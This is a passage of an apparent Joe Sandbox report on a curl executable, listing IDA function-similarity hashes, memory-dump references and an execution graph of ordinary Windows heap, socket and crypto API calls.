                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ___from_strstr_to_strchrgethostname
                                • String ID: localhost
                                • API String ID: 2455561156-2663516195
                                • Opcode ID: c67c4d995ead4d7a837dc611dfe1a875c41fab0a26da9ce872c8783ca7835903
                                • Instruction ID: e30c24c6c34a40de0daacd8b249ceb1b172e77fd3b22741fdac1c881d49ce651
                                • Opcode Fuzzy Hash: c67c4d995ead4d7a837dc611dfe1a875c41fab0a26da9ce872c8783ca7835903
                                • Instruction Fuzzy Hash: AA0168B0A18308AEDB10E7749C50AAA77B8FF04300F8400ACD785EB281DE31AD4AC765
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00866CE3
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00866CF8
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _strdupfree
                                • String ID: ;auto
                                • API String ID: 1865132094-1462600812
                                • Opcode ID: 8c60b86059251eabcd8f4d02548eb734a4b73a9285701f68745a11a7f5d36163
                                • Instruction ID: c17a8b281f9bde1652345bf04c62513f1d03c546f02f4fba226915605e883f28
                                • Opcode Fuzzy Hash: 8c60b86059251eabcd8f4d02548eb734a4b73a9285701f68745a11a7f5d36163
                                • Instruction Fuzzy Hash: F5013C7410CB819FD7528A3888942A67AE5FF9A314F1A0E5DE0DAC7241EB25D445C716
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00867782
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0086779E
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _strdupfree
                                • String ID: a
                                • API String ID: 1865132094-3904355907
                                • Opcode ID: 31c1cf56c1a6a77533afb4d6f5ccc13697fdba8d38066cdb2f8427db208af064
                                • Instruction ID: c0bcd6ac926d4b2629c7b64a9d70bec3dd474efc3a4496dd82e9408ac6d495dd
                                • Opcode Fuzzy Hash: 31c1cf56c1a6a77533afb4d6f5ccc13697fdba8d38066cdb2f8427db208af064
                                • Instruction Fuzzy Hash: 70016D7450C7C19ED712CB3484442ABBBE5FF9A318F1A4F4DE0E9DB241DB21D8068752
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 008675FB
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00004000), ref: 00867617
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: _strdupfree
                                • String ID: SRP
                                • API String ID: 1865132094-1918707673
                                • Opcode ID: fa9dc15f8d49bb24a8f2ee08ce6dbe2910b1e6eb67c193d835d98f249bee1469
                                • Instruction ID: 7005f51007cc09a6e7a7a96c22e22ef3791d9a9cc2f84e516f01727f1054edc2
                                • Opcode Fuzzy Hash: fa9dc15f8d49bb24a8f2ee08ce6dbe2910b1e6eb67c193d835d98f249bee1469
                                • Instruction Fuzzy Hash: D0F09031308600CFE610DF78A445BABB3E5FB80305F12891EE54ADB240EF30D8018BA1
                                APIs
                                • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(curl: ,?,?,0086878D,?,%s,00000000), ref: 0086916A
                                Strings
                                • curl: , xrefs: 00869165
                                • curl: try 'curl --help' for more information, xrefs: 00869188
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: fputs
                                • String ID: curl: $curl: try 'curl --help' for more information
                                • API String ID: 1795875747-4128371185
                                • Opcode ID: 6962dd62f95090d43a2b2e37567793e0bb9313f2a2df58ad6f3dc08066bcae80
                                • Instruction ID: a1296ae979ff832f14d4cf963c53705d5d17320363013cd583f5e298115f0842
                                • Opcode Fuzzy Hash: 6962dd62f95090d43a2b2e37567793e0bb9313f2a2df58ad6f3dc08066bcae80
                                • Instruction Fuzzy Hash: 27E01A3500460CAFDB049F44EC06AE93BA9FB44354F108114F92C863A1D676EA60CA51
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00887312
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008873DB
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008873EF
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00887451
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 4625ac36fdd86f57ba748af19f89741962e329d8f3b4f878409ffa7fd27ad782
                                • Instruction ID: 14f6f88497565d114ca30e904617f87f2db9d822066ef16c32c99208f087fbc7
                                • Opcode Fuzzy Hash: 4625ac36fdd86f57ba748af19f89741962e329d8f3b4f878409ffa7fd27ad782
                                • Instruction Fuzzy Hash: A6614831A0861ADFDB04DF58D884AADBBF1FF48310F2881A9E815EB351D770AD41DB91
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AF91E
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AF94E
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AF99B
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AF9AB
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: malloc
                                • String ID:
                                • API String ID: 2803490479-0
                                • Opcode ID: 233db4dd8fa6398a4af81b13c5086e016febde5959516f53fffd1a404c0303ce
                                • Instruction ID: b4f62e5936281741b4b2ddcfb86ce29a33ac769e97f596a2b0d307f178605116
                                • Opcode Fuzzy Hash: 233db4dd8fa6398a4af81b13c5086e016febde5959516f53fffd1a404c0303ce
                                • Instruction Fuzzy Hash: 3A411531A04619EFCB049F68E884A5DBFF5FF09350B1881AAE809EB351DB71AD54CB94
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0089711C), ref: 008B01E4
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0089711C), ref: 008B0212
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,0089711C), ref: 008B0233
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008B024A
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: e4b82dd32d511cfa90dbb9785c7de737e202c6702c82bc5e9809af30e79d4627
                                • Instruction ID: 06b540809867fc6fc646ec84c769063e196f342f17197e76336335a8cd05d2f9
                                • Opcode Fuzzy Hash: e4b82dd32d511cfa90dbb9785c7de737e202c6702c82bc5e9809af30e79d4627
                                • Instruction Fuzzy Hash: F4213A76A04A26EFDB095F64EC54918FFB2FF48361754813AE60693B61CB756C20DF80
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00881DBD,?,?,?,00868B8E), ref: 0088151F
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00868B8E), ref: 00881549
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881577
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008815A5
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: e1b8423cb4b639078f22d6c72125a99d169a9f27907641452c3185a1f92e4be9
                                • Instruction ID: 1b8905949c6b806935ecd43239fbb958c6aa409b28304646302840f2c4ab6707
                                • Opcode Fuzzy Hash: e1b8423cb4b639078f22d6c72125a99d169a9f27907641452c3185a1f92e4be9
                                • Instruction Fuzzy Hash: 4C21D572B00918EFEB099B24EC88B98FFA5FF85361F044156D405872A1CF747E15CBA2
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00889633,00000000), ref: 008AA4FB
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00889633,00000000), ref: 008AA52C
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00889633,00000000), ref: 008AA54E
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AA565
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 43a10a2e3c1db7251b83ef62ec000827a93863cb552c8650bcaec63f16b20fe4
                                • Instruction ID: 172c55f0436a5e04c3667c2a7bc5b2ae9c73c2b83c1beeac59c277ad2d12e7e7
                                • Opcode Fuzzy Hash: 43a10a2e3c1db7251b83ef62ec000827a93863cb552c8650bcaec63f16b20fe4
                                • Instruction Fuzzy Hash: D411EA76A00A26EFCB049F65EC94818FFB1FF48361314812AE90993B21CB75A820CFC0
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,?,?,00869BB3,?,?,00000000), ref: 0086FEE1
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,?,?,00869BB3,?,?,00000000), ref: 0086FEF9
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00869BB3,?,?,00000000), ref: 0086FF16
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086FF24
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 1b9350285170be5bde2d086c7982a377c031b15302978d25c69fc0aa49628a96
                                • Instruction ID: f07fd6ca01fcd0732a19a06de21988ef91e6465bb484a6ed2f8c940d490a9071
                                • Opcode Fuzzy Hash: 1b9350285170be5bde2d086c7982a377c031b15302978d25c69fc0aa49628a96
                                • Instruction Fuzzy Hash: CD118232506712DFC7248F94E885F6EBBA4FF01315F22022DE912AB652DB71F950CB94
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089A0A9
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089A0CB
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089A0E8
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089A100
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 488b3812d91f415b937df876a42d41a39f5659c49a23c1ee61e5dcbf48ed2c0d
                                • Instruction ID: 6476358422909a108109f0ad22bfc5580fa147dc9edd27c3eeb181dde2756859
                                • Opcode Fuzzy Hash: 488b3812d91f415b937df876a42d41a39f5659c49a23c1ee61e5dcbf48ed2c0d
                                • Instruction Fuzzy Hash: C4115E36504B16EFDB149F15E848B99BBA1FF4872AF14801AD40183761CB79BC64CFD4
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00881857), ref: 00895C78
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00895CAD
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00895CC4
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00895CDB
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: a515e1aa21c9aee91f3b7357df5faae8d3b99a07739f7ce62fe13805599e673c
                                • Instruction ID: 862fd7770a65f55e7ff8572487d9eea946f7179324f940c19878795bcd4e1062
                                • Opcode Fuzzy Hash: a515e1aa21c9aee91f3b7357df5faae8d3b99a07739f7ce62fe13805599e673c
                                • Instruction Fuzzy Hash: 6501A576A04A2AEFDB055F65EC44818FFB6FF48761324822AE91993761CB756C20CFD0
                                APIs
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AC7B9
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AC7D6
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AC7EF
                                  • Part of subcall function 008AC6E0: CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000040,00000000,754C0130,?,008AC800,00000000), ref: 008AC6F4
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AC816
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: freemalloc$AcquireContextCrypt
                                • String ID:
                                • API String ID: 669775102-0
                                • Opcode ID: 37034b2cd1239c209be4bed71f90ac7686c11753e71048ae9e29f4e3e1dbb408
                                • Instruction ID: d9d05ffdcf1d8800b49bab164cca77553f2a266a11a666d3f1a02651b0b2c34a
                                • Opcode Fuzzy Hash: 37034b2cd1239c209be4bed71f90ac7686c11753e71048ae9e29f4e3e1dbb408
                                • Instruction Fuzzy Hash: 440136367149279BEB045B69BC146197FE5FB86BB17248036D505D3791DF745C00CB90

                                Execution Graph

                                Execution Coverage:5.9%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:2.1%
                                Total number of Nodes:2000
                                Total number of Limit Nodes:163
                                execution_graph 99865 7ffd92c26030 99866 7ffd92c2603d 99865->99866 99867 7ffd92c26050 99865->99867 99870 7ffd92c53520 99866->99870 99873 7ffd92c370d0 99870->99873 99874 7ffd92c370fd 99873->99874 99875 7ffd92c37114 99873->99875 99874->99875 99876 7ffd92c37107 99874->99876 99883 7ffd92c36ce0 99875->99883 99916 7ffd92c37240 WSASetLastError Sleep 99876->99916 99878 7ffd92c3710f 99881 7ffd92c37174 99878->99881 99907 7ffd92c08950 99881->99907 99882 7ffd92c26043 99884 7ffd92c36d38 99883->99884 99885 7ffd92c36d1c 99883->99885 99886 7ffd92c370c5 99884->99886 99887 7ffd92c370ae Sleep 99884->99887 99888 7ffd92c36d47 WSASetLastError 99884->99888 99885->99884 99897 7ffd92c36d61 99885->99897 99887->99886 99894 7ffd92c36f08 99888->99894 99889 7ffd92c08950 _except1 8 API calls 99890 7ffd92c36f31 99889->99890 99890->99881 99891 7ffd92c36ed9 99893 7ffd92c36f6c 99891->99893 99895 7ffd92c36ef0 99891->99895 99892 7ffd92c36efd WSASetLastError 99892->99894 99896 7ffd92c36f79 select 99893->99896 99894->99889 99898 7ffd92c36ef5 99895->99898 99900 7ffd92c36f50 Sleep 99895->99900 99901 7ffd92c36f43 WSASetLastError 99895->99901 99896->99898 99897->99891 99897->99892 99899 7ffd92c36fbf 99898->99899 99906 7ffd92c36fdc 99898->99906 99899->99894 99902 7ffd92c36fc8 WSAGetLastError 99899->99902 99900->99898 99901->99898 99902->99894 99903 7ffd92c370a7 99903->99887 99904 7ffd92c37041 __WSAFDIsSet 99905 7ffd92c3705f __WSAFDIsSet 99904->99905 99904->99906 99905->99906 99906->99903 99906->99904 99906->99905 99908 7ffd92c08959 99907->99908 99909 7ffd92c089b0 IsProcessorFeaturePresent 99908->99909 99910 7ffd92c08964 99908->99910 99911 7ffd92c089c8 99909->99911 99910->99882 99917 7ffd92c08bf0 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 99911->99917 99913 7ffd92c089db 99918 7ffd92c08970 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 99913->99918 99915 7ffd92c08a7d 99915->99882 99916->99878 99917->99913 99918->99915 99919 7ffd92c27cf0 99920 7ffd92c27d1d 99919->99920 99921 7ffd92c27d17 99919->99921 99923 7ffd92c27760 99921->99923 99924 7ffd92c2777e 99923->99924 99925 7ffd92c2779b 99924->99925 99927 7ffd92c530f0 99924->99927 99925->99920 99928 7ffd92c531bd 99927->99928 99929 7ffd92c5310d 99927->99929 99928->99925 99930 7ffd92c53185 closesocket 99929->99930 99931 7ffd92c53127 99929->99931 99933 7ffd92c53152 99929->99933 99930->99933 99931->99933 99934 7ffd92c54fa0 99931->99934 99933->99925 99935 7ffd92c5500b closesocket 99934->99935 99936 7ffd92c54fbd 99934->99936 99935->99933 99936->99935 99937 7ffd92c54fc9 99936->99937 99937->99933 99938 7ffd92c15e30 99941 7ffd92ce6aa0 99938->99941 99942 7ffd92c15e4a BCryptGenRandom 99941->99942 99943 7ffd92bff4e8 99944 7ffd92bff516 99943->99944 99945 7ffd92bff4ed 99943->99945 99945->99944 99950 7ffd92bebe20 19 API calls 2 library calls 99945->99950 99947 7ffd92bff567 99951 7ffd92c69dd0 99947->99951 99949 7ffd92bff578 99950->99947 99952 7ffd92c69dff 99951->99952 99953 7ffd92c69e94 RaiseException 99952->99953 99954 7ffd92c69e7f RtlPcToFileHeader 99952->99954 99953->99949 99954->99953 99956 7ffd92c19872 99957 7ffd92c1988b 99956->99957 99958 7ffd92c1991d 99957->99958 99959 7ffd92c19b23 99957->99959 100001 7ffd92c2c5e0 99958->100001 100064 7ffd92c175b0 55 API calls 99959->100064 99964 7ffd92c19942 99965 7ffd92c199dd 99964->99965 99967 7ffd92c1994c 99964->99967 99969 7ffd92c19972 99964->99969 99966 7ffd92c19aa7 99965->99966 99970 7ffd92c199e5 99965->99970 99985 7ffd92c18dfc 99966->99985 100063 7ffd92c175b0 55 API calls 99966->100063 99971 7ffd92c18790 70 API calls 99967->99971 100040 7ffd92c18790 99969->100040 99970->99969 99974 7ffd92c199ff 99970->99974 99971->99985 99974->99985 100062 7ffd92c2bcb0 56 API calls 99974->100062 99976 7ffd92c19f08 99977 7ffd92c1a900 55 API calls 100000 7ffd92c18c30 99977->100000 99978 7ffd92c19c6e 99981 7ffd92c19cb2 99978->99981 99982 7ffd92c19c92 99978->99982 99978->100000 99986 7ffd92c19cd7 99981->99986 99987 7ffd92c19cb7 99981->99987 100066 7ffd92c26f90 53 API calls 2 library calls 99982->100066 99985->100000 100065 7ffd92c281f0 10 API calls _except1 99985->100065 99992 7ffd92c19d01 99986->99992 99993 7ffd92c19d14 99986->99993 100067 7ffd92c26f90 53 API calls 2 library calls 99987->100067 99989 7ffd92c19a30 99989->99985 99998 7ffd92c18790 70 API calls 99989->99998 100068 7ffd92c26f90 53 API calls 2 library calls 99992->100068 99993->100000 100069 7ffd92c26f90 53 API calls 2 library calls 99993->100069 99996 7ffd92c18790 70 API calls 99996->100000 99998->99985 99999 7ffd92c26f90 53 API calls 99999->100000 100000->99976 100000->99977 100000->99996 100000->99999 100038 7ffd92c281f0 10 API calls _except1 100000->100038 100070 7ffd92c22320 100000->100070 100076 7ffd92c177e0 53 API calls 100000->100076 100077 7ffd92c36260 57 API calls 100000->100077 100002 7ffd92c2c638 100001->100002 100003 7ffd92c2c673 100002->100003 100006 7ffd92c370d0 19 API calls 100002->100006 100004 7ffd92c2c691 100003->100004 100005 7ffd92c2c67a 100003->100005 100008 7ffd92c2c6b9 100004->100008 100078 7ffd92c2cc60 100004->100078 100130 7ffd92c26f90 53 API calls 2 library calls 100005->100130 100006->100003 100009 7ffd92c2c6e2 100008->100009 100027 7ffd92c2c689 100008->100027 100100 7ffd92c2d320 100008->100100 100009->100027 100131 7ffd92c1d530 100009->100131 100013 7ffd92c08950 _except1 8 API calls 100015 7ffd92c19931 100013->100015 100014 7ffd92c2c752 100014->100027 100146 7ffd92c36260 57 API calls 100014->100146 100015->99964 100039 7ffd92c2c8c0 53 API calls 100015->100039 100017 7ffd92c2c76a 100017->100027 100147 7ffd92c37290 55 API calls 100017->100147 100019 7ffd92c2c787 100021 7ffd92c2c794 100019->100021 100025 7ffd92c2c811 100019->100025 100019->100027 100020 7ffd92c2c6f3 100020->100014 100134 7ffd92c27080 100020->100134 100148 7ffd92c281f0 10 API calls _except1 100021->100148 100023 7ffd92c2c875 100153 7ffd92c36260 57 API calls 100023->100153 100025->100023 100028 7ffd92c2c84f 100025->100028 100029 7ffd92c2c836 100025->100029 100027->100013 100028->100023 100030 7ffd92c2c85f 100028->100030 100151 7ffd92c26f90 53 API calls 2 library calls 100029->100151 100152 7ffd92c26f90 53 API calls 2 library calls 100030->100152 100032 7ffd92c2c7a3 100032->100027 100034 7ffd92c2c7e0 100032->100034 100035 7ffd92c2c7fb 100032->100035 100149 7ffd92c26f90 53 API calls 2 library calls 100034->100149 100150 7ffd92c26f90 53 API calls 2 library calls 100035->100150 100038->100000 100039->99964 100041 7ffd92c187cc 100040->100041 100057 7ffd92c18890 100040->100057 100233 7ffd92c1d9b0 100041->100233 100043 7ffd92c08950 _except1 8 API calls 100044 7ffd92c188b8 100043->100044 100061 7ffd92c2bcb0 56 API calls 100044->100061 100045 7ffd92c1883f 100249 7ffd92c1a900 100045->100249 100049 7ffd92c18865 100049->100057 100253 7ffd92c2e4e0 100049->100253 100051 7ffd92c188f3 100053 7ffd92c1898f 100051->100053 100055 7ffd92c18a37 100051->100055 100260 7ffd92c15ff0 19 API calls 100053->100260 100054 7ffd92c189ea 100261 7ffd92c1eae0 63 API calls 100054->100261 100056 7ffd92c22320 61 API calls 100055->100056 100056->100057 100057->100043 100059 7ffd92c18a0b 100059->100057 100060 7ffd92c27080 53 API calls 100059->100060 100060->100057 100061->99985 100062->99989 100063->99985 100064->99985 100065->99978 100066->100000 100067->100000 100068->100000 100069->100000 100071 7ffd92c22343 100070->100071 100072 7ffd92c27080 53 API calls 100071->100072 100075 7ffd92c223d3 100071->100075 100073 7ffd92c223cb 100072->100073 100267 7ffd92c1d670 100073->100267 100075->100000 100076->100000 100077->100000 100097 7ffd92c2ccc0 100078->100097 100081 7ffd92c1d530 2 API calls 100081->100097 100083 7ffd92c27080 53 API calls 100084 